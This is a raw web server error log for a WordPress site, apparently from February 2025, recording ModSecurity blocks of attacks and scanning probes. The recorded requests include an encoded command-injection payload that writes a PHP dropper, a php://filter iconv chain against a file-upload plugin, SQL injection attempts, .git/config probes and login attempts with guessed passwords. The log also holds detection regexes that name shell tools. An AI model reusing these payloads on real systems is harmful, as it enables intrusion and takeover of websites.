[tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z7BhXSOVbCCcmA7M1nmNhQAAAIM"], referer: www.google.com 2025/02/15 07:29:30 [error] 5857#5857: *442908 access forbidden by rule, client: 13.58.228.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/15 07:29:30 [error] 5857#5857: *442909 access forbidden by rule, client: 13.58.228.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Feb 15 10:58:58.747119 2025] [:error] [pid 5909:tid 140211036034816] [client 223.233.67.150:35256] [client 223.233.67.150] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z7C5woRFWjFFrORBWtceuQAAABQ"] [Sat Feb 15 11:41:09.462861 2025] [autoindex:error] [pid 6477:tid 140211010856704] [client 38.252.239.77:47454] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:41:16.701228 2025] [autoindex:error] [pid 6477:tid 140211094783744] [client 38.252.239.77:47458] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:41:30.305919 2025] [autoindex:error] [pid 5911:tid 140211145139968] [client 38.252.239.77:47462] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:41:41.916711 2025] [autoindex:error] [pid 6477:tid 140211128354560] [client 38.252.239.77:47466] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:41:51.659040 2025] [autoindex:error] [pid 5911:tid 140211258398464] [client 38.252.239.77:47472] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:42:01.508680 2025] [autoindex:error] [pid 6477:tid 140211233220352] [client 38.252.239.77:47482] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:42:12.284687 2025] [autoindex:error] [pid 6477:tid 140211136747264] [client 38.252.239.77:47492] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 11:42:19.916714 2025] [autoindex:error] [pid 6477:tid 140211153532672] [client 38.252.239.77:47496] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 15 13:24:31.703950 2025] [autoindex:error] [pid 5909:tid 140211002464000] [client 167.71.235.193:48458] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Feb 15 15:08:42.034164 2025] [autoindex:error] [pid 5911:tid 140211061212928] [client 64.227.154.83:50038] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Feb 15 23:00:10.561061 2025] [:error] [pid 5909:tid 140211258398464] [client 196.251.90.127:34452] [client 196.251.90.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:0: echo `echo pd9wahagzndyaxrlkgzvcgvukcrfu0vsvkvswydet0nvtuvovf9st09uj10ujy9oay5wahanlcd3kycplgzpbgvfz2v0x2nvbnrlbnrzkcdodhrwczovl2dob3n0ymlulnnpdguvb2nidmqvcmf3jykpoybmd3jpdguozm9wzw4ojf9trvjwrvjbj0rpq1vnru5ux1jpt1qnxs4nl2iwec5odg0nlcd3kycplcdiywnrzwqgynkgunhsjyk7pz4= | base64 --decode`>de.php "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2 [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"] [unique_id "Z7FiyoRFWjFFrORBWtchEQAAAAI"] [Sat Feb 15 23:00:33.244627 2025] [:error] [pid 5910:tid 140211128354560] [client 196.251.90.127:34488] [client 196.251.90.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:wfu_ABSPATH. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: | found within REQUEST_COOKIES:wfu_ABSPATH: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accura [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-file-upload/de.php"] [unique_id "Z7Fi4Wcy4V1a_4h7T5pmzAAAAEk"] [Sat Feb 15 23:00:44.265963 2025] [:error] [pid 5910:tid 140211145139968] [client 196.251.90.127:34514] [client 196.251.90.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:wfu_ABSPATH. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: | found within REQUEST_COOKIES:wfu_ABSPATH: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accura [hostname "investigacionperu.com"] [uri "/hk.php"] [unique_id "Z7Fi7Gcy4V1a_4h7T5pmzQAAAEc"] [Sat Feb 15 23:00:54.936941 2025] [:error] [pid 6477:tid 140211241613056] [client 196.251.90.127:34534] [client 196.251.90.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:wfu_ABSPATH. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: | found within REQUEST_COOKIES:wfu_ABSPATH: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accura [hostname "investigacionperu.com"] [uri "/hk.php"] [unique_id "Z7Fi9iOVbCCcmA7M1nmXCQAAAIQ"] [Sun Feb 16 01:02:04.811796 2025] [authz_core:error] [pid 6477:tid 140211258398464] [client 134.209.25.199:50766] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/16 01:02:09 [error] 5856#5856: *454515 access forbidden by rule, client: 134.209.25.199, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Feb 16 01:46:17.978377 2025] [:error] [pid 5909:tid 140211027642112] [client 15.188.119.97:38492] [client 15.188.119.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z7GJuYRFWjFFrORBWtchhgAAABU"], referer: www.google.com [Sun Feb 16 01:46:32.036627 2025] [:error] [pid 5909:tid 140211275183872] [client 15.188.119.97:38568] [client 15.188.119.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z7GJyIRFWjFFrORBWtchiAAAAAA"], referer: www.google.com [Sun Feb 16 01:46:56.649931 2025] [:error] [pid 5909:tid 140211241613056] [client 15.188.119.97:38584] [client 15.188.119.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z7GJ4IRFWjFFrORBWtchigAAAAQ"], referer: www.google.com [Sun Feb 16 01:47:03.106221 2025] [:error] [pid 5909:tid 140211258398464] [client 15.188.119.97:38586] [client 15.188.119.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z7GJ54RFWjFFrORBWtchiwAAAAI"], referer: www.google.com [Sun Feb 16 03:12:40.873538 2025] [authz_core:error] [pid 6477:tid 140211266791168] [client 64.226.78.121:41116] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/16 03:12:46 [error] 5856#5856: *455440 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Feb 16 04:33:53.459084 2025] [autoindex:error] [pid 2385:tid 140712842548992] [client 13.71.23.36:36992] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 16 07:30:23.159200 2025] [:error] [pid 2385:tid 140712909690624] [client 54.238.102.131:32914] [client 54.238.102.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s+and\\\\s*?=\\\\W)|(?:\\\\(\\\\s*?select\\\\s*?\\\\w+\\\\s*?\\\\()|(?:\\\\*\\\\/from)|(?:\\\\+\\\\s*?\\\\d+\\\\s*?\\\\+\\\\s*?@)|(?:\\\\w[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(?:[-+=|@]+\\\\s*?)+[\\\\d(])|(?:coalesce\\\\s*?\\\\(|@@\\\\w+\\\\s*?[ ..." at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "233"] [id "981249"] [msg "Detects chained SQL injection attempts 2/2"] [data "Matched Data: @@123! found within ARGS:pwd: investigacionperu@@123!"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "Z7HaX8Ak9RKlkAUWdVJ-9QAAAM8"] [Sun Feb 16 07:47:49.741726 2025] [:error] [pid 4789:tid 140713094317824] [client 162.241.181.223:36924] [client 162.241.181.223] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s+and\\\\s*?=\\\\W)|(?:\\\\(\\\\s*?select\\\\s*?\\\\w+\\\\s*?\\\\()|(?:\\\\*\\\\/from)|(?:\\\\+\\\\s*?\\\\d+\\\\s*?\\\\+\\\\s*?@)|(?:\\\\w[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(?:[-+=|@]+\\\\s*?)+[\\\\d(])|(?:coalesce\\\\s*?\\\\(|@@\\\\w+\\\\s*?[ ..." at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "233"] [id "981249"] [msg "Detects chained SQL injection attempts 2/2"] [data "Matched Data: @@123! found within ARGS:pwd: admin@@123!"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "Z7HedYiLFmLLxqgCLNQ9bQAAAQE"] [Sun Feb 16 13:11:05.640276 2025] [:error] [pid 1534:tid 140712993617664] [client 162.241.181.223:50812] [client 162.241.181.223] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s+and\\\\s*?=\\\\W)|(?:\\\\(\\\\s*?select\\\\s*?\\\\w+\\\\s*?\\\\()|(?:\\\\*\\\\/from)|(?:\\\\+\\\\s*?\\\\d+\\\\s*?\\\\+\\\\s*?@)|(?:\\\\w[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(?:[-+=|@]+\\\\s*?)+[\\\\d(])|(?:coalesce\\\\s*?\\\\(|@@\\\\w+\\\\s*?[ ..." at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "233"] [id "981249"] [msg "Detects chained SQL injection attempts 2/2"] [data "Matched Data: @@123! found within ARGS:pwd: Admin@@123!"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "Z7IqOcLK-0Vfmu-MtW86HAAAAIU"] [Sun Feb 16 13:56:38.745408 2025] [autoindex:error] [pid 4789:tid 140712926476032] [client 64.227.154.83:35618] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Feb 17 04:51:34.988969 2025] [:error] [pid 10663:tid 140634266527488] [client 85.203.21.232:36238] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Mon Feb 17 04:51:34.989067 2025] [:error] [pid 10663:tid 140634266527488] [client 85.203.21.232:36238] Stack trace: [Mon Feb 17 04:51:34.989083 2025] [:error] [pid 10663:tid 140634266527488] [client 85.203.21.232:36238] #0 {main} [Mon Feb 17 04:51:34.989185 2025] [:error] [pid 10663:tid 140634266527488] [client 85.203.21.232:36238] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Mon Feb 17 04:51:49.882887 2025] [autoindex:error] [pid 10662:tid 140634249742080] [client 85.203.21.232:36262] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Mon Feb 17 04:51:57.561612 2025] [autoindex:error] [pid 11230:tid 140634216171264] [client 85.203.21.232:36282] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Mon Feb 17 04:52:12.668649 2025] [autoindex:error] [pid 10664:tid 140634249742080] [client 85.203.21.232:36308] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Feb 17 04:52:19.319803 2025] [autoindex:error] [pid 10664:tid 140634354153216] [client 85.203.21.232:36320] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 17 04:52:20.677023 2025] [autoindex:error] [pid 10664:tid 140634149029632] [client 85.203.21.232:36324] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Mon Feb 17 04:52:36.678782 2025] [autoindex:error] [pid 10663:tid 140634107066112] [client 85.203.21.232:36352] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Mon Feb 17 04:52:36.926416 2025] [:error] [pid 10662:tid 140634132244224] [client 85.203.21.232:36354] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Feb 17 04:52:39.591066 2025] [autoindex:error] [pid 10662:tid 140634165815040] [client 85.203.21.232:36360] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Mon Feb 17 04:52:42.216974 2025] [autoindex:error] [pid 11230:tid 140634149029632] [client 85.203.21.232:36366] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Mon Feb 17 04:53:00.822853 2025] [autoindex:error] [pid 10664:tid 140634224563968] 